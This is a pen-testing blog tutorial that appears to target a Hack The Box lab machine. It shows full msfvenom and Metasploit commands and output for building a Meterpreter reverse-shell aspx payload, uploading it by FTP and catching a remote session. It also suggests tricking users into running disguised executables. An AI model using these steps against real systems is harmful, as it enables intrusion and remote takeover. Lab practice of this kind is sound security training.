Posted on by Glenn

[ Pen Testing ] :: Step by Step: msfvenom

Msfvenom creates shellcode from within Bash.

Here is Rapid7’s own excellent documentation:
https://github.com/rapid7/metasploit-fraamework/wiki/How-to-use-msfvenom

“Complete How to Guide for MSFvenom”:
https://securitytraning.com/complete-guide-msfvenom/

And a good thorough walk-through (in Spanish, but with regular English command examples):
https://www.hackplayers.com/2018/05/recopilacion-shells-en-windows.html

Open Bash and enter:

msfvenom

to get a syntax page.

View a list of payloads:

msfvenom -l payloads

Create the reverse shell payload. Here we’re using an aspx file, which assumes we’re uploading to a web server. Other options include using an exe file instead, and giving it an attractive name.

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.4 LPORT=4444 -f aspx > shell.aspx
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of aspx file: 2749 bytes

Send the shellcode by whatever means you have:

ftp> put shell.aspx

Open another Bash shell and start msf to listen for incoming connections:

# msf

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.10.10.4
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 10.10.10.4:4444 
[*] Starting the payload handler...

Now you need either to entice the user to run the file (which is why the variety of file types is handy), or if you’ve uploaded to a web server, browse to the file:

http://10.10.10.5/shell.aspx

Either way, once the file is run, Metasploit should get a session:

[*] Sending stage (956991 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.10.4:4444 -> 10.10.10.5:49157) at 2018-12-2 meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows

.